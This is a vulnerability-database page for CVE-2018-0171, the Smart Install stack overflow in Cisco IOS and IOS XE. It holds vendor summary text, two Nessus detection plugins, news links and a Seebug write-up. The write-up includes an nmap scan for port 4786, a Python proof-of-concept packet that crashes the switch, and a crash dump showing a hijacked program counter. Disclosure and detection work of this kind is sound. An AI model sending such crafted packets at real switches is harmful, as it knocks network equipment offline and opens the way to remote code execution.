Vulnerabilities > CVE-2018-0171 - Out-of-bounds Write vulnerability in Cisco IOS 15.2(5)E
Summary
A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, Causing an indefinite loop on the affected device that triggers a watchdog crash. Cisco Bug IDs: CSCvg76186.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
OS | 1 |
Common Weakness Enumeration (CWE)
Exploit-Db
description | Cisco Smart Install - Crash (PoC). CVE-2018-0171. Dos exploit for Hardware platform |
id | EDB-ID:44451 |
last seen | 2018-05-24 |
modified | 2018-03-29 |
published | 2018-03-29 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/44451/ |
title | Cisco Smart Install - Crash (PoC) |
Nessus
NASL family CISCO NASL id CISCO-SA-20180328-SMI2-IOSXE.NASL description According to its self-reported version, the IOS XE is affected by one or more vulnerabilities. Please see the included Cisco BIDs and the Cisco Security Advisory for more information. last seen 2020-03-17 modified 2018-03-29 plugin id 108723 published 2018-03-29 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/108723 title Cisco IOS XE Software Smart Install Remote Code Execution Vulnerability code #TRUSTED 3d54c31be0047a2adc4fbf1e737d3942bb1ee8a01c15978e738b69947955150c0f9199713695081d90ac3b67acb01a784928aaf10b3bafd2518e39814ff2ded6bfaba6bc54457d9b2c0b9edd9cb644044e9a21057f1f49b88fb7ead96cd69215326cd9353fe65d98919d07ef7e6603a86c968651c030ec86c5cbeb67b8dd8d08657052e0ec9904841b75b98d24289e08f2b5f98eabbd575d273937cf719f4a4cff4aca1b3230a7946902ce24aa45afe4ec44e21048b2a0eb5846c0c091e3063d06b27577c80241a54f022fbfd4525b3838c071f609fc8412bb8d8c069c3b0adb5ed7698f4d61e2698c3a57ca09935d7dcbeac7760162bf6200cc763ba4a475d1555b3545f3b18016f866eeefafbf58efb64758b5392e00d851e6e747ee3461712fbd4c49b8ee08c13423c77761993d4846bef972d0e387b7a84ff8e2c1f9dbdfd3e490a747807908e9ef04f120a1f931b3060dbbcb5b777f32fc163d3f34cfbaa0a15f439152e7bbc6047ecedc6fe982b7ab30c9975090b50c6780cb458a58511132d25cb61b33e5ffcb53ed759666a2ceaa45e8cf7a4584806ab3a70c2917cd0e9d1333cf95769b7218f1cbaffc916cf18c21d8ad0b9c9355798a64ef812c497a59f5dc208bbabb9d025ad757380e62ff70ffc95a2a76c9fb6a62578a8bf2601126ccc6e19b8d3bfcb9d3f28726f5a04b19d70d7fa971f9747a332204237b2f # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(108723); script_version("1.14"); script_set_attribute(attribute:"plugin_modification_date", value:"2019/04/02"); script_cve_id("CVE-2018-0171"); script_bugtraq_id(103538); script_xref(name:"CISCO-BUG-ID", value:"CSCvg76186"); script_xref(name:"CISCO-SA", value:"cisco-sa-20180328-smi2"); script_xref(name:"IAVA", value:"2018-A-0097"); script_name(english:"Cisco IOS XE Software Smart Install Remote Code Execution Vulnerability"); script_summary(english:"Checks the IOS XE version."); script_set_attribute(attribute:"synopsis", value: "The remote device is missing a vendor-supplied security patch."); script_set_attribute(attribute:"description", value: "According to its self-reported version, the IOS XE is affected by one or more vulnerabilities. Please see the included Cisco BIDs and the Cisco Security Advisory for more information."); # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?09597efb"); script_set_attribute(attribute:"see_also", value:"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg76186"); script_set_attribute(attribute:"solution", value: "Upgrade to the relevant fixed version referenced in Cisco bug ID(s) CSCvg76186."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-0171"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/03/28"); script_set_attribute(attribute:"patch_publication_date", value:"2018/03/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/03/29"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:cpe:/o:cisco:ios_xe"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CISCO"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("cisco_ios_xe_version.nasl"); script_require_keys("Host/Cisco/IOS-XE/Version"); exit(0); } include("audit.inc"); include("cisco_workarounds.inc"); include("ccf.inc"); product_info = cisco::get_product_info(name:"Cisco IOS XE Software"); version_list = make_list( "3.2.0SE", "3.2.1SE", "3.2.2SE", "3.2.3SE", "3.3.0SE", "3.3.1SE", "3.3.2SE", "3.3.3SE", "3.3.4SE", "3.3.5SE", "3.3.0XO", "3.3.1XO", "3.3.2XO", "3.4.0SG", "3.4.2SG", "3.4.1SG", "3.4.3SG", "3.4.4SG", "3.4.5SG", "3.4.6SG", "3.4.7SG", "3.4.8SG", "3.5.0E", "3.5.1E", "3.5.2E", "3.5.3E", "3.6.0E", "3.6.1E", "3.6.0aE", "3.6.0bE", "3.6.2aE", "3.6.2E", "3.6.3E", "3.6.4E", "3.6.5E", "3.6.6E", "3.6.5aE", "3.6.5bE", "3.6.7E", "3.6.7aE", "3.6.7bE", "3.7.0E", "3.7.1E", "3.7.2E", "3.7.3E", "3.7.4E", "3.7.5E", "16.1.1", "16.1.2", "16.1.3", "3.2.0JA", "16.2.1", "16.2.2", "3.8.0E", "3.8.1E", "3.8.2E", "3.8.3E", "3.8.4E", "3.8.5E", "3.8.5aE", "16.3.1", "16.3.2", "16.3.3", "16.3.1a", "16.3.4", "16.3.5", "16.3.5b", "16.4.1", "16.5.1", "16.5.1a", "3.9.0E", "3.9.1E", "3.9.2E", "3.9.2bE", "16.6.1", "3.10.0E", "3.10.0cE" ); workarounds = make_list(CISCO_WORKAROUNDS['smart_install_check']); workaround_params = make_list(); reporting = make_array( 'port' , 0, 'severity' , SECURITY_HOLE, 'version' , product_info['version'], 'bug_id' , "CSCvg76186", 'cmds' , make_list("show vstack config") ); cisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);
NASL family CISCO NASL id CISCO-SA-20180328-SMI2-IOS.NASL description According to its self-reported version, the IOS is affected by one or more vulnerabilities. Please see the included Cisco BIDs and the Cisco Security Advisory for more information. last seen 2020-03-17 modified 2018-03-29 plugin id 108722 published 2018-03-29 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/108722 title Cisco IOS Software Smart Install Remote Code Execution Vulnerability code #TRUSTED 5223c63d580014b0a005dea499f18ca43eb22c77f95235f542e54f310a18e26fcd157439c3163a9a6eb8ca7e42c15755c20f66bfc77d8b19af67fb4d2ddfe3e25b128ed8afd71b9968eac5ba3c921439c722151ad2bd9f7b34199045ab0ac99a2b871d1f0e21eb94535b37da0cf42d4712830d2c0b7e99cb5f535cec8e9db573a1ca5ae3b3e96add9500436e65fb137a8a2b8e00587ffe0064e2e7e700e2ea481cc5b61b4187b8aa4430bfbd2f9ed6976f9cdfffff99c87a1faf9b1fbe3114db977f0801de3e535593bd669bf255b378479c58bc13fa464611b22e17a1acc6e0dfaf8376462592989258dfac77b9ff56cc3fd526a61cd6f2a259ddb7dbf99fb40a959bc90340b9d170a67534ce54e977c40b6e463d3faffab0b7c3589b096824e40200ce2648e2209d316e6a944bd8a99c9b7d6c4374ebde585c0918cc6d71c9ddeb3a3d306d401195ff93339c580dc93e71b3edba0b82f5cd1574f39642afacabaf47400e95432453adfa602424b1aaa19f2078a87cb82e8d94dc0af5e5651329775baa358a9d345915fcf392fdf65f3c814f9c958c6e06dee4d8ab608067bd887e12b89c7192fce9a61457eb25c65cbda7e8b044c1bb94d8a883e8649143ada7626f58170a8e39475c89639422246eface0ff26e04b1036d3b2b237edf0ba9eb16164a6b3705c64bfeb210e9ea18c1803dab83f6527ec94d03c9db75a29a36 # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(108722); script_version("1.12"); script_set_attribute(attribute:"plugin_modification_date", value:"2019/04/02"); script_cve_id("CVE-2018-0171"); script_bugtraq_id(103538); script_xref(name:"CISCO-BUG-ID", value:"CSCvg76186"); script_xref(name:"CISCO-SA", value:"cisco-sa-20180328-smi2"); script_xref(name:"IAVA", value:"2018-A-0097"); script_name(english:"Cisco IOS Software Smart Install Remote Code Execution Vulnerability"); script_summary(english:"Checks the IOS version."); script_set_attribute(attribute:"synopsis", value: "The remote device is missing a vendor-supplied security patch."); script_set_attribute(attribute:"description", value: "According to its self-reported version, the IOS is affected by one or more vulnerabilities. Please see the included Cisco BIDs and the Cisco Security Advisory for more information."); # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?09597efb"); script_set_attribute(attribute:"see_also", value:"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg76186"); script_set_attribute(attribute:"solution", value: "Upgrade to the relevant fixed version referenced in Cisco bug ID(s) CSCvg76186."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-0171"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/03/28"); script_set_attribute(attribute:"patch_publication_date", value:"2018/03/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/03/29"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:cpe:/o:cisco:ios"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CISCO"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("cisco_ios_version.nasl"); script_require_keys("Host/Cisco/IOS/Version"); exit(0); } include("audit.inc"); include("cisco_workarounds.inc"); include("ccf.inc"); product_info = cisco::get_product_info(name:"Cisco IOS"); version_list = make_list( "12.2(55)SE", "12.2(55)SE3", "12.2(55)SE2", "12.2(58)SE", "12.2(55)SE1", "12.2(58)SE1", "12.2(55)SE4", "12.2(58)SE2", "12.2(55)SE5", "12.2(55)SE6", "12.2(55)SE7", "12.2(55)SE8", "12.2(55)SE9", "12.2(55)SE10", "12.2(55)SE11", "12.2(55)SE12", "12.2(55)EX", "12.2(55)EX1", "12.2(55)EX2", "12.2(55)EX3", "12.2(55)EY", "12.2(55)EZ", "15.0(1)EY", "15.0(1)EY2", "15.0(1)SE", "15.0(2)SE", "15.0(1)SE1", "15.0(1)SE2", "15.0(1)SE3", "15.0(2)SE1", "15.0(2)SE2", "15.0(2)SE3", "15.0(2)SE4", "15.0(2)SE5", "15.0(2)SE6", "15.0(2)SE7", "15.0(2)SE8", "15.0(2)SE9", "15.0(2a)SE9", "15.0(2)SE10", "15.0(2)SE11", "15.0(2)SE10a", "15.1(2)SG", "15.1(2)SG1", "15.1(2)SG2", "15.1(2)SG3", "15.1(2)SG4", "15.1(2)SG5", "15.1(2)SG6", "15.1(2)SG7", "15.1(2)SG8", "15.1(2)SG8a", "15.0(2)EX", "15.0(2)EX1", "15.0(2)EX2", "15.0(2)EX3", "15.0(2)EX4", "15.0(2)EX5", "15.0(2)EX6", "15.0(2)EX7", "15.0(2)EX8", "15.0(2a)EX5", "15.0(2)EX10", "15.0(2)EX11", "15.0(2)EX13", "15.0(2)EX12", "15.2(1)E", "15.2(2)E", "15.2(1)E1", "15.2(3)E", "15.2(1)E2", "15.2(1)E3", "15.2(2)E1", "15.2(2b)E", "15.2(4)E", "15.2(3)E1", "15.2(2)E2", "15.2(2a)E1", "15.2(2)E3", "15.2(2a)E2", "15.2(3)E2", "15.2(3a)E", "15.2(3)E3", "15.2(3m)E2", "15.2(4)E1", "15.2(2)E4", "15.2(2)E5", "15.2(4)E2", "15.2(4m)E1", "15.2(3)E4", "15.2(5)E", "15.2(3m)E7", "15.2(4)E3", "15.2(2)E6", "15.2(5a)E", "15.2(5)E1", "15.2(5b)E", "15.2(4m)E3", "15.2(3m)E8", "15.2(2)E5a", "15.2(5c)E", "15.2(3)E5", "15.2(2)E5b", "15.2(4n)E2", "15.2(4o)E2", "15.2(5a)E1", "15.2(4)E4", "15.2(2)E7", "15.2(5)E2", "15.2(4p)E1", "15.2(6)E", "15.2(5)E2b", "15.2(4)E5", "15.2(5)E2c", "15.2(4m)E2", "15.2(4o)E3", "15.2(4q)E1", "15.2(6)E0a", "15.2(2)E7b", "15.2(4)E5a", "15.2(6)E0c", "15.2(4s)E1", "15.2(4s)E2", "15.2(4)JN1", "15.0(2)EZ", "15.2(1)EY", "15.0(2)EJ", "15.0(2)EJ1", "15.2(5)EX", "15.2(4)JAZ1", "15.2(2)EB", "15.2(2)EB1", "15.2(2)EB2", "15.2(2)EA", "15.2(2)EA1", "15.2(2)EA2", "15.2(3)EA", "15.2(4)EA", "15.2(4)EA1", "15.2(2)EA3", "15.2(4)EA3", "15.2(5)EA", "15.2(4)EA4", "15.2(4)EA2", "15.2(4)EA5", "15.2(4)EA6", "15.2(4)EC1", "15.2(4)EC2" ); workarounds = make_list(CISCO_WORKAROUNDS['smart_install_check']); workaround_params = make_list(); reporting = make_array( 'port' , 0, 'severity' , SECURITY_HOLE, 'version' , product_info['version'], 'bug_id' , "CSCvg76186", 'cmds' , make_list("show vstack config") ); cisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);
Seebug
bulletinFamily | exploit |
description | ### Introduction * Application: Cisco IOS, Cisco IOS-XE * Vendor: Cisco * Bugs: Stack-based buffer overflow [CWE-20], [CWE-121] * Risk: Critical; AV:N/AC:L/Au:N/C:C/I:C/A:C (10.0) A stack-based buffer overflow vulnerability was found in Smart Install Client code. This vulnerability enables an attacker to remotely execute arbitrary code without authentication. So it allows getting full control over a vulnerable network equipment. Smart Install is a plug-and-play configuration and image-management feature that provides zero-touch deployment for new switches. It automates the process of initial configuration and the loading of the current operating system image for a new network switch. This means that you can ship a switch to a location, place it in the network and power it on with no configuration on the device required and without an administrator. The technology also provides a backup of the configuration when it changes and hot-swapping broken equipment. A network using Smart Install includes a group of network devices, known as clients, that are served by a common Layer 3 switch or router that acts as a director. ![](https://images.seebug.org/1522296234245) ### Smart Install Network The director provides a single management point for images and configuration of client switches. Client switches have a direct or indirect connection to the director so that they can receive image and configuration downloads from it. More information about the Smart Install technology can be found in the official [documentation](https://www.cisco.com/c/en/us/td/docs/switches/lan/smart_install/configuration/guide/smart_install/concepts.html). The vulnerability is located right in the code of Smart Install Client. It is important to note that the technology requires that it be enabled on clients by default. This fact affects the coverage and impact of the vulnerability, but more on this below. ### Vulnerability Description The SMI IBC Server Process process contains a Smart Install Client implementation code. The Smart Install Client starts a server on the TCP(4786) port (opened by default) to interact with the Smart Install Director. When this server is processing a specially crafted malicious message ibd_init_discovery_msg a stack-based buffer overflow occurs. To be more precise, the buffer overflow takes place in the function smi_ibc_handle_ibd_init_discovery_msg ![](https://images.seebug.org/1522296272312) Vulnerable Function CFG because the size of the data copied to a fixed-size buffer is not checked. The size and data are taken directly from the network packet and are controlled by an attacker. ### GeekPWN 2017 Hong Kong This vulnerability won the G-Influence award at GeekPWN 2017 Hong-Kong after its successful exploitation had been demonstrated. About GeekPwn. As one of the world’s leading platforms for cyber-security researchers, GeekPwn enables security researchers and executives around the world to share their thoughts and findings. Since 2014, GeekPwn has successfully held 8 sessions in Beijing, Shanghai, Macau, Hong Kong and Silicon Valley, and responsibly disclosed hundreds of critical security vulnerabilities and awarded over millions (USD) to contestants. Under the terms of the contest, it was necessary to attack the Cisco Catalyst 2960 switch and fulfill two conditions: 1. Reset or change the enable password to enter privileged EXEC mode: * https://youtu.be/CE7KNK6UJuk 2. Intercept traffic between other devices connected to the switch and the Internet: * https://youtu.be/TSg5EZVudNU More details on the techniques and methods used to create the exploit for this vulnerability can be found in our research “How To Cook Cisco”. ### How to check the equipments for vulnerability If you have a Cisco network equipment with an open TCP 4786 port, it is vulnerable. In order to find such equipment, simply scan your network. ``` nmap -p T:4786 192.168.1.0/24 ``` To check whether the network equipment is of a Smart Install Client type, enter the following commands: ``` switch>show vstack config Role: Client (SmartInstall enabled) Vstack Director IP address: 0.0.0.0 switch>show tcp brief all TCB Local Address Foreign Address (state) 0344B794 *.4786 *.* LISTEN 0350A018 *.443 *.* LISTEN 03293634 *.443 *.* LISTEN 03292D9C *.80 *.* LISTEN 03292504 *.80 *.* LISTEN ``` ### Internet scan results After the vulnerability was discovered, we decided that it could only be used for attacks inside an enterprise network. Because in a securely configured network, Smart Install technology participants should not be accessible through the Internet. But scanning the Internet has shown that this is not true. During a short scan of the Internet, we detected 250,000 vulnerable devices and 8,5 million devices that have a vulnerable port open. Probably, this happens because on Smart Install clients the port TCP(4786) is opened by default and network administrators do not notice this somehow. ### Affected Hardware/Software ![](https://images.seebug.org/1522296384396) Cisco_Catalyst_Series_Switches The vulnerability was checked on the following devices: Catalyst 4500 Supervisor Engines, Cisco Catalyst 3850 Series Switches, and Cisco Catalyst 2960 Series Switches. * Cisco Catalyst 4500 Supervisor Engine 6L-E * Cisco IOS 15.2.2E6 (Latest, Suggested) * cat4500e-entservicesk9-mz.152-2.E6.bin (23-DEC-2016) * Cisco Catalyst 2960-48TT-L Switch * Cisco IOS 12.2(55)SE11 (Suggested) * c2960-lanbasek9-mz.122-55.SE11.bin (18-AUG-2016) * Cisco IOS 15.0.2-SE10a (Latest) * c2960-lanbasek9-mz.150-2.SE10a.bin (10-NOV-2016) * Cisco Catalyst 3850-24P-E Switch * Cisco IOS-XE 03.03.05.SE * cat3k_caa-universalk9.SPA.03.03.05.SE.150-1.EZ5.bin (03-NOV-2014) Moreover, all devices that may fall into the Smart Install Client type are potentially vulnerable. Here is a list of them: * Catalyst 4500 Supervisor Engines * Catalyst 3850 Series * Catalyst 3750 Series * Catalyst 3650 Series * Catalyst 3560 Series * Catalyst 2960 Series * Catalyst 2975 Series * IE 2000 * IE 3000 * IE 3010 * IE 4000 * IE 4010 * IE 5000 * SM-ES2 SKUs * SM-ES3 SKUs * NME-16ES-1G-P * SM-X-ES3 SKUs For more information, please, check: * [Cisco Security Advisory](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed) * [Cisco Feature Navigator](http://cfn.cloudapps.cisco.com/ITDIT/CFN/jsp/index.jsp) * [Supported Devices for Smart Install](https://www.cisco.com/c/en/us/td/docs/switches/lan/smart_install/configuration/guide/smart_install/supported_devices.html#51890) ### Proof of Concept The following is a listing of PoC for the vulnerability: ``` # smi_ibc_init_discovery_BoF.py import socket import struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args() def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'): return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v def send_packet(sock, packet): sock.send(packet) def receive(sock): return sock.recv() if __name__ == "__main__": print "[*] Connecting to Smart Install Client ", options.target, "port", options.port con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) con.connect((options.target, options.port)) payload = 'BBBB' * 44 shellcode = 'D' * 2048 data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload tlv_1 = craft_tlv(0x00000001, data) tlv_2 = shellcode pkt = hdr + tlv_1 + tlv_2 print "[*] Send a malicious packet" send_packet(con, pkt) ``` To attack the switch, run the command below: ``` host$ ./smi_ibc_init_discovery_BoF.py -t 192.168.1.1 ``` Switch should print a crash info and reboot: ``` 00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 1200, PC = 42424240 -Traceback= 42424240 Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15 === Flushing messages (00:10:39 UTC Mon Mar 1 1993) === Buffered messages: ... Queued messages: Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2016 by Cisco Systems, Inc. Compiled Wed 17-Aug-16 13:46 by prod_rel_team Instruction TLB Miss Exception (0x1200)! SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230 ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000 CPU Register Context: Vector = 0x00001200 PC = 0x42424240 MSR = 0x00029230 CR = 0x33000053 LR = 0x42424242 CTR = 0x014D5268 XER = 0xC000006A R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4 R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014 R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFF R12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8 R16 = 0x02B1B128 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x02B1B128 R20 = 0x02B1B128 R21 = 0x00000001 R22 = 0x02B1B128 R23 = 0x02B1B1A8 R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242 R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242 Stack trace: PC = 0x42424240, SP = 0x02B1B0B0 Frame 00: SP = 0x42424242 PC = 0x42424242 ``` Diclosure Timeline * 13/05/2017 – The vulnerability was presented at the GeekPWN 2017 Hong-Kong. Under the terms of the competition, interaction with the vendor for fixing the vulnerability is the right and responsibility of the GeekPWN organizers. * 26/09/2017 – We informed the vendor about our planned talk “How to cook Cisco. The exploit development for Cisco IOS” at the EKOPARTY 2017 conference and clarified the planned date of disclosure of the vulnerability. Vendor’s response is below: ![](https://images.seebug.org/1522296562156) * 28/03/2018 – Final fix. The advisory cisco-sa-20180328-smi2 was published. And CVE-2018-0171 assignmented. * 28/03/2018 – Blog article posted. |
id | SSV:97206 |
last seen | 2018-03-29 |
modified | 2018-03-29 |
published | 2018-03-29 |
reporter | Root |
source | https://www.seebug.org/vuldb/ssvid-97206 |
title | Cisco Smart Install Remote Code Execution(CVE-2018-0171) |
The Hacker News
id THN:281560A81151A934501A27157417DD37 last seen 2018-04-09 modified 2018-04-09 published 2018-04-08 reporter Mohit Kumar source https://thehackernews.com/2018/04/hacking-cisco-smart-install.html title Here's how hackers are targeting Cisco Network Switches in Russia and Iran id THN:3347044068F87AF8B4B5B834EC20FE3F last seen 2018-04-04 modified 2018-04-04 published 2018-04-04 reporter Swati Khandelwal source https://thehackernews.com/2018/04/cisco-switches-hacking.html title Critical flaw leaves thousands of Cisco Switches vulnerable to remote hacking
Related news
- Unprotected Switches Expose Critical Infrastructure to Attacks: Cisco (source)
- Critical flaw leaves thousands of Cisco Switches vulnerable to remote hacking (source)
- Critical vulnerability opens Cisco switches to remote attack (source)
- Critical Flaw Exposes Many Cisco Devices to Remote Attacks (source)
References
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
- http://www.securitytracker.com/id/1040580
- http://www.securityfocus.com/bid/103538
- https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490
- https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05
- https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04